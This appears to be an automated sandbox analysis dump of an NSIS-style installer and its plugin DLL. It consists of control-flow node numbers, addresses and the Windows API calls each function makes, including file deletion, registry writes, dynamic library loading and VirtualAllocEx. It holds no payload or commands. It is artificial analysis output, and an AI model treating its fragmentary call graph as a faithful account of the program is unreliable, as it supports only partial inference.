VerQueryValueW 5359->5360 5360->5358 5361 401f72 5360->5361 5365 405e2f wsprintfW 5361->5365 5363 401f7e 5366 405e2f wsprintfW 5363->5366 5365->5363 5366->5358 4103 401389 4105 401390 4103->4105 4104 4013fe 4105->4104 4106 4013cb MulDiv SendMessageW 4105->4106 4106->4105 5374 10002a4b 5375 10002a63 5374->5375 5376 100015a7 2 API calls 5375->5376 5377 10002a7e 5376->5377 5378 1000224c 5379 100022b1 5378->5379 5380 100022e7 5378->5380 5379->5380 5381 100022c3 GlobalAlloc 5379->5381 5381->5379 5382 404b0e GetDlgItem GetDlgItem 5383 404b60 7 API calls 5382->5383 5386 404d79 5382->5386 5384 404c03 DeleteObject 5383->5384 5385 404bf6 SendMessageW 5383->5385 5387 404c0c 5384->5387 5385->5384 5393 404e5d 5386->5393 5397 404a5c 5 API calls 5386->5397 5410 404dea 5386->5410 5388 404c43 5387->5388 5391 405f0a 18 API calls 5387->5391 5389 40412d 19 API calls 5388->5389 5392 404c57 5389->5392 5390 404f09 5394 404f13 SendMessageW 5390->5394 5395 404f1b 5390->5395 5396 404c25 SendMessageW SendMessageW 5391->5396 5398 40412d 19 API calls 5392->5398 5393->5390 5399 404eb6 SendMessageW 5393->5399 5425 404d6c 5393->5425 5394->5395 5402 404f34 5395->5402 5403 404f2d ImageList_Destroy 5395->5403 5411 404f44 5395->5411 5396->5387 5397->5410 5416 404c65 5398->5416 5405 404ecb SendMessageW 5399->5405 5399->5425 5400 404194 8 API calls 5406 4050ff 5400->5406 5401 404e4f SendMessageW 5401->5393 5407 404f3d GlobalFree 5402->5407 5402->5411 5403->5402 5404 4050b3 5412 4050c5 ShowWindow GetDlgItem ShowWindow 5404->5412 5404->5425 5409 404ede 5405->5409 5407->5411 5408 404d3a GetWindowLongW SetWindowLongW 5413 404d53 5408->5413 5420 404eef SendMessageW 5409->5420 5410->5393 5410->5401 5411->5404 5424 404adc 4 API calls 5411->5424 5429 404f7f 5411->5429 5412->5425 5414 404d71 5413->5414 5415 404d59 ShowWindow 5413->5415 5434 404162 SendMessageW 5414->5434 5433 404162 SendMessageW 5415->5433 5416->5408 5419 404cb5 SendMessageW 5416->5419 5421 404d34 5416->5421 5422 404cf1 SendMessageW 5416->5422 5423 404d02 SendMessageW 5416->5423 5419->5416 5420->5390 5421->5408 5421->5413 5422->5416 5423->5416 5424->5429 5425->5400 5426 405089 InvalidateRect 5426->5404 5427 40509f 5426->5427 5430 404976 21 API calls 5427->5430 5428 404fad SendMessageW 5432 404fc3 5428->5432 5429->5428 5429->5432 5430->5404 5431 405037 SendMessageW SendMessageW 5431->5432 5432->5426 5432->5431 5433->5425 5434->5386 5435 100016ce 5436 100016fd 5435->5436 5437 10001b3e 24 API calls 5436->5437 5438 10001704 5437->5438 5439 10001717 5438->5439 5440 1000170b 5438->5440 5442 10001721 5439->5442 5443 1000173e 5439->5443 5441 10001280 2 API calls 5440->5441 5449 10001715 5441->5449 5446 10001555 3 API calls 5442->5446 5444 10001744 5443->5444 5445 10001768 5443->5445 5447 100015cc 3 API calls 5444->5447 5448 10001555 3 API calls 5445->5448 5450 10001726 5446->5450 5451 10001749 5447->5451 5448->5449 5452 100015cc 3 API calls 5450->5452 5453 10001280 2 API calls 5451->5453 5454 1000172c 5452->5454 5455 1000174f GlobalFree 5453->5455 5456 10001280 2 API calls 5454->5456 5455->5449 5457 10001763 GlobalFree 5455->5457 5458 10001732 GlobalFree 5456->5458 5457->5449 5458->5449 5459 404910 5460 404920 5459->5460 5461 40493c 5459->5461 5470 4056a8 GetDlgItemTextW 5460->5470 5463 404942 SHGetPathFromIDListW 5461->5463 5464 40496f 5461->5464 5466 404959 SendMessageW 5463->5466 5467 404952 5463->5467 5465 40492d SendMessageW 5465->5461 5466->5464 5468 40140b 2 API calls 5467->5468 5468->5466 5470->5465 5471 401491 5472 405192 25 API calls 5471->5472 5473 401498 5472->5473 5474 402293 5475 402b38 18 API calls 5474->5475 5476 4022a2 5475->5476 5477 402b38 18 API calls 5476->5477 5478 4022ab 5477->5478 5479 402b38 18 API calls 5478->5479 5480 4022b5 GetPrivateProfileStringW 5479->5480 4579 401f98 4580 40205c 4579->4580 4581 401faa 4579->4581 4584 401423 25 API calls 4580->4584 4582 402b38 18 API calls 4581->4582 4583 401fb1 4582->4583 4585 402b38 18 API calls 4583->4585 4589 402195 4584->4589 4586 401fba 4585->4586 4587 401fd0 LoadLibraryExW 4586->4587 4588 401fc2 GetModuleHandleW 4586->4588 4587->4580 4590 401fe1 4587->4590 4588->4587 4588->4590 4602 4062be WideCharToMultiByte 4590->4602 4593 401ff2 4595 402011 4593->4595 4596 401ffa 4593->4596 4594 40202b 4597 405192 25 API calls 4594->4597 4605 10001771 4595->4605 4598 401423 25 API calls 4596->4598 4599 402002 4597->4599 4598->4599 4599->4589 4600 40204e FreeLibrary 4599->4600 4600->4589 4603 4062e8 GetProcAddress 4602->4603 4604 401fec 4602->4604 4603->4604 4604->4593 4604->4594 4606 100017a1 4605->4606 4647 10001b3e 4606->4647 4608 100017a8 4609 100018be 4608->4609 4610 100017c0 4608->4610 4611 100017b9 4608->4611 4609->4599 4681 100022eb 4610->4681 4699 100022a1 4611->4699 4616 10001824 4621 10001866 4616->4621 4622 1000182a 4616->4622 4617 10001806 4712 1000248d 4617->4712 4618 100017d6 4626 100017e7 4618->4626 4627 100017dc 4618->4627 4619 100017ef 4631 100017e5 4619->4631 4709 10002b2b 4619->4709 4624 1000248d 11 API calls 4621->4624 4629 100015cc 3 API calls 4622->4629 4632 10001858 4624->4632 4703 10002614 4626->4703 4627->4631 4693 10002870 4627->4693 4630 10001840 4629->4630 4635 1000248d 11 API calls 4630->4635 4631->4616 4631->4617 4638 100018ad 4632->4638 4736 10002450 4632->4736 4635->4632 4637 100017ed 4637->4631 4638->4609 4640 100018b7 GlobalFree 4638->4640 4640->4609 4644 10001899 4644->4638 4740 10001555 wsprintfW 4644->4740 4645 10001892 FreeLibrary 4645->4644 4743 1000121b GlobalAlloc 4647->4743 4649 10001b62 4744 1000121b GlobalAlloc 4649->4744 4651 10001b6d 4745 10001243 4651->4745 4653 10001da0 GlobalFree GlobalFree GlobalFree 4654 10001dbd 4653->4654 4668 10001e07 4653->4668 4656 1000210d 4654->4656 4662 10001dd2 4654->4662 4654->4668 4655 10001c43 GlobalAlloc 4678 10001b75 4655->4678 4657 1000212f GetModuleHandleW 4656->4657 4656->4668 4660 10002140 LoadLibraryW 4657->4660 4661 10002155 4657->4661 4658 10001c8e lstrcpyW 4663 10001c98 lstrcpyW 4658->4663 4659 10001cac GlobalFree 4659->4678 4660->4661 4660->4668 4756 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4661->4756 4662->4668 4752 1000122c 4662->4752 4663->4678 4665 100021a7 4666 100021b4 lstrlenW 4665->4666 4665->4668 4757 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4666->4757 4668->4608 4669 10002167 4669->4665 4680 10002191 GetProcAddress 4669->4680 4671 10002067 4671->4668 4676 100020af lstrcpyW 4671->4676 4673 10001cea 4673->4678 4750 100015a7 GlobalSize GlobalAlloc 4673->4750 4674 10001f56 GlobalFree 4674->4678 4675 100021ce 4675->4668 4676->4668 4678->4653 4678->4655 4678->4658 4678->4659 4678->4663 4678->4668 4678->4671 4678->4673 4678->4674 4679 1000122c 2 API calls 4678->4679 4755 1000121b GlobalAlloc 4678->4755 4679->4678 4680->4665 4690 10002303 4681->4690 4682 1000122c GlobalAlloc lstrcpynW 4682->4690 4683 10001243 3 API calls 4683->4690 4685 10002419 GlobalFree 4686 100017c6 4685->4686 4685->4690 4686->4618 4686->4619 4686->4631 4687 100023d5 GlobalAlloc WideCharToMultiByte 4687->4685 4688 100023ae GlobalAlloc CLSIDFromString 4688->4685 4689 10002390 lstrlenW 4689->4685 4692 1000239b 4689->4692 4690->4682 4690->4683 4690->4685 4690->4687 4690->4688 4690->4689 4760 100012c8 4690->4760 4692->4685 4765 100025a8 4692->4765 4695 10002882 4693->4695 4694 10002927 VirtualAllocEx 4696 10002945 4694->4696 4695->4694 4697 10002a41 4696->4697 4698 10002a36 GetLastError 4696->4698 4697->4631 4698->4697 4700 100022b1 4699->4700 4701 100017bf 4699->4701 4700->4701 4702 100022c3 GlobalAlloc 4700->4702 4701->4610 4702->4700 4707 10002630 4703->4707 4704 10002681 GlobalAlloc 4708 100026a3 4704->4708 4705 10002694 4706 10002699 GlobalSize 4705->4706 4705->4708 4706->4708 4707->4704 4707->4705 4708->4637 4710 10002b36 4709->4710 4711 10002b76 GlobalFree 4710->4711 4716 100024ad 4712->4716 4714 10002540 lstrcpyW 4714->4716 4715 100024db wsprintfW 4715->4716 4716->4714 4716->4715 4717 10002561 GlobalFree 4716->4717 4718 1000250e MultiByteToWideChar 4716->4718 4719 1000258a GlobalFree 4716->4719 4721 100024fd lstrcpynW 4716->4721 4722 10001280 2 API calls 4716->4722 4723 100024ec StringFromGUID2 4716->4723 4768 1000121b GlobalAlloc 4716->4768 4769 100012f3 4716->4769 4717->4716 4718->4716 4719->4716 4720 1000180c 4719->4720 4725 100015cc 4720->4725 4721->4716 4722->4716 4723->4716 4773 1000121b GlobalAlloc 4725->4773 4727 100015d2 4728 100015df lstrcpyW 4727->4728 4730 100015f9 4727->4730 4731 10001613 4728->4731 4730->4731 4732 100015fe wsprintfW 4730->4732 4733 10001280 4731->4733 4732->4731 4734 100012c3 GlobalFree 4733->4734 4735 10001289 GlobalAlloc lstrcpynW 4733->4735 4734->4632 4735->4734 4737 1000245e 4736->4737 4738 10001879 4736->4738 4737->4738 4739 1000247a GlobalFree 4737->4739 4738->4644 4738->4645 4739->4737 4741 10001280 2 API calls 4740->4741 4742 10001576 4741->4742 4742->4638 4743->4649 4744->4651 4746 1000127c 4745->4746 4747 1000124d 4745->4747 4746->4678 4747->4746 4758 1000121b GlobalAlloc 4747->4758 4749 10001259 lstrcpyW GlobalFree 4749->4678 4751 100015c5 4750->4751 4751->4673 4759 1000121b GlobalAlloc 4752->4759 4754 1000123b lstrcpynW 4754->4668 4755->4678 4756->4669 4757->4675 4758->4749 4759->4754 4761 100012d0 4760->4761 4762 100012ee 4760->4762 4761->4762 4763 1000122c 2 API calls 4761->4763 4762->4762 4764 100012ec 4763->4764 4764->4690 4766 100025b6 VirtualAlloc 4765->4766 4767 1000260c 4765->4767 4766->4767 4767->4692 4768->4716 4770 10001324 4769->4770 4771 100012fc 4769->4771 4770->4716 4771->4770 4772 10001308 lstrcpyW 4771->4772 4772->4770 4773->4727 5481 10001058 5482 10001243 3 API calls 5481->5482 5484 10001074 5482->5484 5483 100010dd 5484->5483 5485 1000152e 4 API calls 5484->5485 5486 10001092 5484->5486 5485->5486 5487 1000152e 4 API calls 5486->5487 5488 100010a2 5487->5488 5489 100010b2 5488->5489 5490 100010a9 GlobalSize 5488->5490 5491 100010b6 GlobalAlloc 5489->5491 5492 100010c7 5489->5492 5490->5489 5493 10001555 3 API calls 5491->5493 5494 100010d2 GlobalFree 5492->5494 5493->5492 5494->5483 5495 401718 5496 402b38 18 API calls 5495->5496 5497 40171f SearchPathW 5496->5497 5498 40173a 5497->5498 4793 40159b 4794 402b38 18 API calls 4793->4794 4795 4015a2 SetFileAttributesW 4794->4795 4796 4015b4 4795->4796 5499 40149e 5500 40223c 5499->5500 5501 4014ac PostQuitMessage 5499->5501 5501->5500 5502 40219e 5503 402b38 18 API calls 5502->5503 5504 4021a4 5503->5504 5505 402b38 18 API calls 5504->5505 5506 4021ad 5505->5506 5507 402b38 18 API calls 5506->5507 5508 4021b6 5507->5508 5509 40622b 2 API calls 5508->5509 5510 4021bf 5509->5510 5511 4021d0 lstrlenW lstrlenW 5510->5511 5512 4021c3 5510->5512 5514 405192 25 API calls 5511->5514 5513 405192 25 API calls 5512->5513 5516 4021cb 5512->5516 5513->5516 5515 40220e SHFileOperationW 5514->5515 5515->5512 5515->5516 5517 4029a0 SendMessageW 5518 4029ba InvalidateRect 5517->5518 5519 4029c5 5517->5519 5518->5519 5527 100010e1 5528 10001111 5527->5528 5529 10001243 3 API calls 5528->5529 5539 10001121 5529->5539 5530 100011d8 GlobalFree 5531 100012c8 2 API calls 5531->5539 5532 100011d3 5532->5530 5533 10001243 3 API calls 5533->5539 5534 10001164 GlobalAlloc 5534->5539 5535 100011f8 GlobalFree 5535->5539 5536 10001280 2 API calls 5538 100011c4 GlobalFree 5536->5538 5537 100012f3 lstrcpyW 5537->5539 5538->5539 5539->5530 5539->5531 5539->5532 5539->5533 5539->5534 5539->5535 5539->5536 5539->5537 5539->5538 5540 402222 5541 402229 5540->5541 5544 40223c 5540->5544 5542 405f0a 18 API calls 5541->5542 5543 402236 5542->5543 5545 4056c4 MessageBoxIndirectW 5543->5545 5545->5544 5546 401b22 5547 401b73 5546->5547 5548 401b2f 5546->5548 5549 401b78 5547->5549 5550 401b9d GlobalAlloc 5547->5550 5551 401bb8 5548->5551 5554 401b46 5548->5554 5559 40223c 5549->5559 5567 405ee8 lstrcpynW 5549->5567 5553 405f0a 18 API calls 5550->5553 5552 405f0a 18 API calls 5551->5552 5551->5559 5555 402236 5552->5555 5553->5551 5565 405ee8 lstrcpynW 5554->5565 5561 4056c4 MessageBoxIndirectW 5555->5561 5558 401b8a GlobalFree 5558->5559 5560 401b55 5566 405ee8 lstrcpynW 5560->5566 5561->5559 5563 401b64 5568 405ee8 lstrcpynW 5563->5568 5565->5560 5566->5563 5567->5558 5568->5559 3904 401924 3905 401926 3904->3905 3910 402b38 3905->3910 3911 402b44 3910->3911 3955 405f0a 3911->3955 3914 40192b 3916 405770 3914->3916 3994 405a3b 3916->3994 3919 405798 DeleteFileW 3921 401934 3919->3921 3920 4057af 3922 4058da 3920->3922 4008 405ee8 lstrcpynW 3920->4008 3922->3921 4038 40622b FindFirstFileW 3922->4038 3924 4057d5 3925 4057e8 3924->3925 3926 4057db lstrcatW 3924->3926 4009 40597f lstrlenW 3925->4009 3927 4057ee 3926->3927 3931 4057fe lstrcatW 3927->3931 3933 405809 lstrlenW FindFirstFileW 3927->3933 3931->3933 3932 4058f8 4041 405933 lstrlenW CharPrevW 3932->4041 3936 4058cf 3933->3936 3953 40582b 3933->3953 3936->3922 3937 4058b2 FindNextFileW 3941 4058c8 FindClose 3937->3941 3937->3953 3938 405728 5 API calls 3940 40590a 3938->3940 3942 405924 3940->3942 3943 40590e 3940->3943 3941->3936 3945 405192 25 API calls 3942->3945 3943->3921 3946 405192 25 API calls 3943->3946 3945->3921 3948 40591b 3946->3948 3947 405770 64 API calls 3947->3953 3950 405d82 40 API calls 3948->3950 3949 405192 25 API calls 3949->3937 3952 405922 3950->3952 3952->3921 3953->3937 3953->3947 3953->3949 4013 405ee8 lstrcpynW 3953->4013 4014 405728 3953->4014 4022 405192 3953->4022 4033 405d82 3953->4033 3956 405f17 3955->3956 3957 406162 3956->3957 3960 405fca GetVersion 3956->3960 3961 406130 lstrlenW 3956->3961 3964 405f0a 10 API calls 3956->3964 3966 406045 GetSystemDirectoryW 3956->3966 3967 406058 GetWindowsDirectoryW 3956->3967 3968 40617c 5 API calls 3956->3968 3969 40608c SHGetSpecialFolderLocation 3956->3969 3970 405f0a 10 API calls 3956->3970 3971 4060d1 lstrcatW 3956->3971 3982 405db5 RegOpenKeyExW 3956->3982 3987 405e2f wsprintfW 3956->3987 3988 405ee8 lstrcpynW 3956->3988 3958 402b65 3957->3958 3989 405ee8 lstrcpynW 3957->3989 3958->3914 3973 40617c 3958->3973 3960->3956 3961->3956 3964->3961 3966->3956 3967->3956 3968->3956 3969->3956 3972 4060a4 SHGetPathFromIDListW CoTaskMemFree 3969->3972 3970->3956 3971->3956 3972->3956 3980 406189 3973->3980 3974 4061ff 3975 406204 CharPrevW 3974->3975 3977 406225 3974->3977 3975->3974 3976 4061f2 CharNextW 3976->3974 3976->3980 3977->3914 3979 4061de CharNextW 3979->3980 3980->3974 3980->3976 3980->3979 3981 4061ed CharNextW 3980->3981 3990 405960 3980->3990 3981->3976 3983 405e29 3982->3983 3984 405de9 RegQueryValueExW 3982->3984 3983->3956 3985 405e0a RegCloseKey 3984->3985 3985->3983 3987->3956 3988->3956 3989->3958 3991 405966 3990->3991 3992 40597c 3991->3992 3993 40596d CharNextW 3991->3993 3992->3980 3993->3991 4044 405ee8 lstrcpynW 3994->4044 3996 405a4c 4045 4059de CharNextW CharNextW 3996->4045 3999 405790 3999->3919 3999->3920 4000 40617c 5 API calls 4006 405a62 4000->4006 4001 405a93 lstrlenW 4002 405a9e 4001->4002 4001->4006 4004 405933 3 API calls 4002->4004 4003 40622b 2 API calls 4003->4006 4005 405aa3 GetFileAttributesW 4004->4005 4005->3999 4006->3999 4006->4001 4006->4003 4007 40597f 2 API calls 4006->4007 4007->4001 4008->3924 4010 40598d 4009->4010 4011 405993 CharPrevW 4010->4011 4012 40599f 4010->4012 4011->4010 4011->4012 4012->3927 4013->3953 4051 405b2f GetFileAttributesW 4014->4051 4017 405743 RemoveDirectoryW 4020 405751 4017->4020 4018 40574b DeleteFileW 4018->4020 4019 405755 4019->3953 4020->4019 4021 405761 SetFileAttributesW 4020->4021 4021->4019 4023 4051ad 4022->4023 4024 40524f 4022->4024 4025 4051c9 lstrlenW 4023->4025 4026 405f0a 18 API calls 4023->4026 4024->3953 4027 4051f2 4025->4027 4028 4051d7 lstrlenW 4025->4028 4026->4025 4030 405205 4027->4030 4031 4051f8 SetWindowTextW 4027->4031 4028->4024 4029 4051e9 lstrcatW 4028->4029 4029->4027 4030->4024 4032 40520b SendMessageW SendMessageW SendMessageW 4030->4032 4031->4030 4032->4024 4054 406252 GetModuleHandleA 4033->4054 4037 405daa 4037->3953 4039 406241 FindClose 4038->4039 4040 4058f4 4038->4040 4039->4040 4040->3921 4040->3932 4042 4058fe 4041->4042 4043 40594f lstrcatW 4041->4043 4042->3938 4043->4042 4044->3996 4046 4059fb 4045->4046 4049 405a0d 4045->4049 4048 405a08 CharNextW 4046->4048 4046->4049 4047 405a31 4047->3999 4047->4000 4048->4047 4049->4047 4050 405960 CharNextW 4049->4050 4050->4049 4052 405b41 SetFileAttributesW 4051->4052 4053 405734 4051->4053 4052->4053 4053->4017 4053->4018 4053->4019 4055 406279 GetProcAddress 4054->4055 4056 40626e LoadLibraryA 4054->4056 4057 405d89 4055->4057 4056->4055 4056->4057 4057->4037 4058 405c06 lstrcpyW 4057->4058 4059 405c55 GetShortPathNameW 4058->4059 4060 405c2f 4058->4060 4061 405c6a 4059->4061 4062 405d7c 4059->4062 4083 405b54 GetFileAttributesW CreateFileW 4060->4083 4061->4062 4064 405c72 wsprintfA 4061->4064 4062->4037 4066 405f0a 18 API calls 4064->4066 4065 405c39 CloseHandle GetShortPathNameW 4065->4062 4067 405c4d 4065->4067 4068 405c9a 4066->4068 4067->4059 4067->4062 4084 405b54 GetFileAttributesW CreateFileW 4068->4084 4070 405ca7 4070->4062 4071 405cb6 GetFileSize GlobalAlloc 4070->4071 4072 405d75 CloseHandle 4071->4072 4073 405cd8 4071->4073 4072->4062 4085 405bd7 ReadFile 4073->4085 4078 405cf7 lstrcpyA 4081 405d19 4078->4081 4079 405d0b 4080 405ab9 4 API calls 4079->4080 4080->4081 4082 405d50 SetFilePointer WriteFile GlobalFree 4081->4082 4082->4072 4083->4065 4084->4070 4086 405bf5 4085->4086 4086->4072 4087 405ab9 lstrlenA 4086->4087 4088 405afa lstrlenA 4087->4088 4089 405b02 4088->4089 4090 405ad3 lstrcmpiA 4088->4090 4089->4078 4089->4079 4090->4089 4091 405af1 CharNextA 4090->4091 4091->4088 5569 10001667 5570 1000152e 4 API calls 5569->5570 5573 1000167f 5570->5573 5571 100016c5 GlobalFree 5572 1000169a 5572->5571 5573->5571 5573->5572 5574 100016b1 VirtualFree 5573->5574 5574->5571 5575 402727 5576 4029c5 5575->5576 5577 40272e 5575->5577 5578 402734 FindClose 5577->5578 5578->5576 5579 401cab 5580 402b1b 18 API calls 5579->5580 5581 401cb2 5580->5581 5582 402b1b 18 API calls 5581->5582 5583 401cba GetDlgItem 5582->5583 5584 4024e6 5583->5584 4117 40232f 4118 402335 4117->4118 4119 402b38 18 API calls 4118->4119 4120 402347 4119->4120 4121 402b38 18 API calls 4120->4121 4122 402351 RegCreateKeyExW 4121->4122 4123 40237b 4122->4123 4125 402791 4122->4125 4124 402396 4123->4124 4126 402b38 18 API calls 4123->4126 4129 402b1b 18 API calls 4124->4129 4132 4023a2 4124->4132 4128 40238c lstrlenW 4126->4128 4127 4023bd RegSetValueExW 4131 4023d3 RegCloseKey 4127->4131 4128->4124 4129->4132 4131->4125 4132->4127 4134 403060 4132->4134 4135 403070 SetFilePointer 4134->4135 4136 40308c 4134->4136 4135->4136 4149 40317b GetTickCount 4136->4149 4139 405bd7 ReadFile 4140 4030ac 4139->4140 4141 40317b 43 API calls 4140->4141 4145 403137 4140->4145 4142 4030c3 4141->4142 4143 40313d ReadFile 4142->4143 4142->4145 4146 4030d3 4142->4146 4143->4145 4145->4127 4146->4145 4147 405bd7 ReadFile 4146->4147 4148 403106 WriteFile 4146->4148 4147->4146 4148->4145 4148->4146 4150 4032e5 4149->4150 4151 4031aa 4149->4151 4152 402d18 33 API calls 4150->4152 4162 40330d SetFilePointer 4151->4162 4158 403093 4152->4158 4154 4031b5 SetFilePointer 4159 4031da 4154->4159 4158->4139 4158->4145 4159->4158 4160 40326f WriteFile 4159->4160 4161 4032c6 SetFilePointer 4159->4161 4163 4032f7 4159->4163 4166 40638e 4159->4166 4173 402d18 4159->4173 4160->4158 4160->4159 4161->4150 4162->4154 4164 405bd7 ReadFile 4163->4164 4165 40330a 4164->4165 4165->4159 4167 4063b3 4166->4167 4168 4063bb 4166->4168 4167->4159 4168->4167 4169 406442 GlobalFree 4168->4169 4170 40644b GlobalAlloc 4168->4170 4171 4064c2 GlobalAlloc 4168->4171 4172 4064b9 GlobalFree 4168->4172 4169->4170 4170->4167 4170->4168 4171->4167 4171->4168 4172->4171 4174 402d41 4173->4174 4175 402d29 4173->4175 4178 402d51 GetTickCount 4174->4178 4179 402d49 4174->4179 4176 402d32 DestroyWindow 4175->4176 4177 402d39 4175->4177 4176->4177 4177->4159 4178->4177 4181 402d5f 4178->4181 4188 40628b 4179->4188 4182 402d94 CreateDialogParamW ShowWindow 4181->4182 4183 402d67 4181->4183 4182->4177 4183->4177 4192 402cfc 4183->4192 4185 402d75 wsprintfW 4186 405192 25 API calls 4185->4186 4187 402d92 4186->4187 4187->4177 4189 4062a8 PeekMessageW 4188->4189 4190 4062b8 4189->4190 4191 40629e DispatchMessageW 4189->4191 4190->4177 4191->4189 4193 402d0b 4192->4193 4194 402d0d MulDiv 4192->4194 4193->4194 4194->4185 5585 4016af 5586 402b38 18 API calls 5585->5586 5587 4016b5 GetFullPathNameW 5586->5587 5588 4016cf 5587->5588 5589 4016f1 5587->5589 5588->5589 5592 40622b 2 API calls 5588->5592 5590 4029c5 5589->5590 5591 401706 GetShortPathNameW 5589->5591 5591->5590 5593 4016e1 5592->5593 5593->5589 5595 405ee8 lstrcpynW 5593->5595 5595->5589 5603 4027b3 5604 402b38 18 API calls 5603->5604 5605 4027c1 5604->5605 5606 4027d7 5605->5606 5607 402b38 18 API calls 5605->5607 5608 405b2f 2 API calls 5606->5608 5607->5606 5609 4027dd 5608->5609 5629 405b54 GetFileAttributesW CreateFileW 5609->5629 5611 4027ea 5612 402893 5611->5612 5613 4027f6 GlobalAlloc 5611->5613 5616 40289b DeleteFileW 5612->5616 5617 4028ae 5612->5617 5614 40288a CloseHandle 5613->5614 5615 40280f 5613->5615 5614->5612 5630 40330d SetFilePointer 5615->5630 5616->5617 5619 402815 5620 4032f7 ReadFile 5619->5620 5621 40281e GlobalAlloc 5620->5621 5622 402862 WriteFile GlobalFree 5621->5622 5623 40282e 5621->5623 5624 403060 46 API calls 5622->5624 5625 403060 46 API calls 5623->5625 5626 402887 5624->5626 5628 40283b 5625->5628 5626->5614 5627 402859 GlobalFree 5627->5622 5628->5627 5629->5611 5630->5619 5631 4028b4 5632 402b1b 18 API calls 5631->5632 5633 4028ba 5632->5633 5634 4028f6 5633->5634 5635 4028dd 5633->5635 5640 402791 5633->5640 5638 402900 5634->5638 5639 40290c 5634->5639 5636 4028e2 5635->5636 5637 4028f3 5635->5637 5645 405ee8 lstrcpynW 5636->5645 5637->5640 5646 405e2f wsprintfW 5637->5646 5641 402b1b 18 API calls 5638->5641 5642 405f0a 18 API calls 5639->5642 5641->5637 5642->5637 5645->5640 5646->5640 5647 4014b8 5648 4014be 5647->5648 5649 401389 2 API calls 5648->5649 5650 4014c6 5649->5650 4774 4015b9 4775 402b38 18 API calls 4774->4775 4776 4015c0 4775->4776 4777 4059de 4 API calls 4776->4777 4787 4015c9 4777->4787 4778 401614 4780 401646 4778->4780 4781 401619 4778->4781 4779 405960 CharNextW 4782 4015d7 CreateDirectoryW 4779->4782 4786 401423 25 API calls 4780->4786 4783 401423 25 API calls 4781->4783 4784 4015ed GetLastError 4782->4784 4782->4787 4785 401620 4783->4785 4784->4787 4788 4015fa GetFileAttributesW 4784->4788 4792 405ee8 lstrcpynW 4785->4792 4791 40163e 4786->4791 4787->4778 4787->4779 4788->4787 4790 40162d SetCurrentDirectoryW 4790->4791 4792->4790 5651 401939 5652 402b38 18 API calls 5651->5652 5653 401940 lstrlenW 5652->5653 5654 4024e6 5653->5654 5655 402939 5656 402b1b 18 API calls 5655->5656 5657 40293f 5656->5657 5658 402972 5657->5658 5660 402791 5657->5660 5661 40294d 5657->5661 5659 405f0a 18 API calls 5658->5659 5658->5660 5659->5660 5661->5660 5663 405e2f wsprintfW 5661->5663 5663->5660 5664 40653d 5668 4063c1 5664->5668 5665 406d2c 5666 406442 GlobalFree 5667 40644b GlobalAlloc 5666->5667 5667->5665 5667->5668 5668->5665 5668->5666 5668->5667 5669 4064c2 GlobalAlloc 5668->5669 5670 4064b9 GlobalFree 5668->5670 5669->5665 5669->5668 5670->5669 4809 40173f 4810 402b38 18 API calls 4809->4810 4811 401746 4810->4811 4812 405b83 2 API calls 4811->4812 4813 40174d 4812->4813 4814 405b83 2 API calls 4813->4814 4814->4813

                          Executed Functions

                          Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335stringfilecomCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 16 4034f8-403512 GetTempPathW call 403324 12->16 14 403417-40341c 13->14 15 40341e-403424 13->15 14->14 14->15 18 403426-40342a 15->18 19 40342b-40342f 15->19 23 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 16->23 24 40356a-403584 DeleteFileW call 402dba 16->24 18->19 21 403435-40343b 19->21 22 4034c9-4034d4 call 405960 19->22 26 403455-40346c 21->26 27 40343d-403444 21->27 22->11 39 4034d6-4034d7 22->39 23->24 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 23->42 44 40361a-403629 call 4037c0 OleUninitialize 24->44 45 40358a-403590 24->45 28 40349a-4034b0 26->28 29 40346e-403484 26->29 33 403446-403449 27->33 34 40344b 27->34 28->22 37 4034b2-4034c7 28->37 29->28 35 403486-40348e 29->35 33->26 33->34 34->26 40 403490-403493 35->40 41 403495 35->41 37->22 43 4034e6-4034f3 call 405ee8 37->43 39->11 40->28 40->41 41->28 42->24 42->44 43->16 55 403725-40372b 44->55 56 40362f-40363f call 4056c4 ExitProcess 44->56 48 403592-40359d call 405960 45->48 49 40360a-403611 call 4038b2 45->49 59 4035d4-4035de 48->59 60 40359f-4035b0 48->60 58 403616 49->58 62 4037a8-4037b0 55->62 63 40372d-40374a call 406252 * 3 55->63 58->44 67 4035e0-4035ee call 405a3b 59->67 68 403645-40365f lstrcatW lstrcmpiW 59->68 64 4035b2-4035b4 60->64 65 4037b2 62->65 66 4037b6-4037ba ExitProcess 62->66 90 403794-40379f ExitWindowsEx 63->90 91 40374c-40374e 63->91 72 4035b6-4035cc 64->72 73 4035ce-4035d2 64->73 65->66 67->44 81 4035f0-403606 call 405ee8 * 2 67->81 68->44 75 403661-403677 CreateDirectoryW SetCurrentDirectoryW 68->75 72->59 72->73 73->59 73->64 78 403684-4036ad call 405ee8 75->78 79 403679-40367f call 405ee8 75->79 89 4036b2-4036ce call 405f0a DeleteFileW 78->89 79->78 81->49 99 4036d0-4036e0 CopyFileW 89->99 100 40370f-403717 89->100 90->62 96 4037a1-4037a3 call 40140b 90->96 91->90 94 403750-403752 91->94 94->90 101 403754-403766 GetCurrentProcess 94->101 96->62 99->100 102 4036e2-403702 call 405d82 call 405f0a call 405663 99->102 100->89 103 403719-403720 call 405d82 100->103 101->90 108 403768-40378a 101->108 102->100 115 403704-40370b CloseHandle 102->115 103->44 108->90 115->100
                          APIs
                          • #17.COMCTL32 ref: 00403377
                          • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                          • OleInitialize.OLE32(00000000), ref: 00403389
                            • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                            • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                            • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                          • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
